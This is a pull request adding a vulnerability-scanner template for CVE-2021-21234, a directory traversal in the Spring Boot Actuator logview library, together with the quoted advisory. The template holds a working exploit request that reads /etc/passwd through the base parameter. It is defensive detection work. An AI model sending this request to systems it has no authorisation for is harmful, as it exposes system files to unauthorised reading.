### PR TITLE
Create CVE-2021-21234.yaml

### DIFF
--- a/cves/2021/CVE-2021-21234.yaml
+++ b/cves/2021/CVE-2021-21234.yaml
@@ -1,0 +1,24 @@
+id: CVE-2021-21234
+
+info:
+  name: Spring Boot Actuator Logview - Directory Traversal
+  author: gy741
+  severity: high
+  reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
+  tags: cve,cve2021,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

--- a/cves/2021/CVE-2021-21234.yaml
+++ b/cves/2021/CVE-2021-21234.yaml
@@ -5,7 +5,7 @@ info:
   author: gy741
   severity: high
   reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
-  tags: cve,cve2021,lfi
+  tags: cve,cve2021,springboot,lfi
 
 requests:
   - method: GET


### PR DESCRIPTION
Hello,

Added CVE-2021-21234 rule.

```
spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy.
```

Ref : https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234

Thanks.